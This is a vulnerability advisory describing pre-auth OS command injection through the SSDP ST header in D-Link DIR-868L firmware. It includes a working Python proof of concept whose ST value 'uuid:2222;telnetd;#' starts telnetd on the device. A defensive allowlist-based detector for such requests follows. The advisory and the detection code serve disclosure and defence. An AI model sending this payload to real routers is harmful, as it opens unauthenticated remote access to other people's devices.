[PRODUCT]
D-LINK
[Vendor of Product]
[VERSION]
DIR-868L_REVA1_FW110b03
[Vulnerability Type]
OS command injection
[Description]
The D-Link DIR-868L_REVA1_FW110b03 was found to contain a pre-auth OS command injection vulnerability in the SSDP service function through the request header parameter.

When we control the ST parameter so that it passes the if segment, the other parameter enters the sub_1BF84 function.

In the sub_1BF84 function, the parameter is spliced into the string s, and system is called with s as its argument.

import socket, sys, time

if len(sys.argv) != 2:
    print(f"Usage: {sys.argv[0]} <target_ip>")
    sys.exit(1)

target_ip = sys.argv[1]

# Send SSDP request
payload = f"M-SEARCH * HTTP/1.1\r\nHOST: {target_ip}:1900\r\nST: uuid:2222;telnetd;#\r\nMAN: \"ssdp:discover\"\r\nMX: 2\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
try:
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
    sock.sendto(payload.encode(), (target_ip, 1900))
    print(f"[INFO] Sent malicious SSDP request to {target_ip}:1900")
finally:
    sock.close()
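
A detection-side counterpart to the request above, as an added example that is not part of the original advisory: it parses UDP/1900 payloads and flags any M-SEARCH whose ST header is not one of the search-target forms defined by UPnP. The function names, the exact character classes in the allowlist and the sample datagrams are assumptions of this example.

```python
import re

# ST forms defined by the UPnP Device Architecture; anything else is rejected.
# The exact character classes are an assumption of this example.
ALLOWED_ST = re.compile(
    r"ssdp:all|upnp:rootdevice|uuid:[A-Za-z0-9_-]+"
    r"|urn:[A-Za-z0-9.-]+:(?:device|service):[A-Za-z0-9._-]+:[0-9]+"
)

def parse_msearch(datagram: bytes):
    """Return the headers of an M-SEARCH request, or None for other traffic."""
    lines = datagram.decode("latin-1").split("\r\n")
    if not lines[0].upper().startswith("M-SEARCH "):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().upper()] = value.strip()
    return headers

def check_st(datagram: bytes):
    """Classify one UDP/1900 payload as 'ignore', 'ok' or 'suspicious'."""
    headers = parse_msearch(datagram)
    if headers is None:
        return ("ignore", None)
    st = headers.get("ST", "")
    # fullmatch: one stray byte (';', '#', a space, a newline) fails the check,
    # and so does a missing or empty ST header.
    verdict = "ok" if ALLOWED_ST.fullmatch(st) else "suspicious"
    return (verdict, st)

# Constructed sample datagrams; the third carries the ST value from the request above.
SAMPLES = [
    b'M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n'
    b'MAN: "ssdp:discover"\r\nMX: 2\r\nST: ssdp:all\r\n\r\n',
    b'M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nMAN: "ssdp:discover"\r\n'
    b'MX: 2\r\nST: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n\r\n',
    b'M-SEARCH * HTTP/1.1\r\nHOST: 192.0.2.1:1900\r\n'
    b'ST: uuid:2222;telnetd;#\r\nMAN: "ssdp:discover"\r\nMX: 2\r\n\r\n',
    b'NOTIFY * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n'
    b'NT: upnp:rootdevice\r\nNTS: ssdp:alive\r\n\r\n',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(check_st(sample))
```

The same allowlist is the shape of the fix on the device side: validate ST against the known forms before it is used anywhere, rather than trying to strip shell metacharacters from it.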
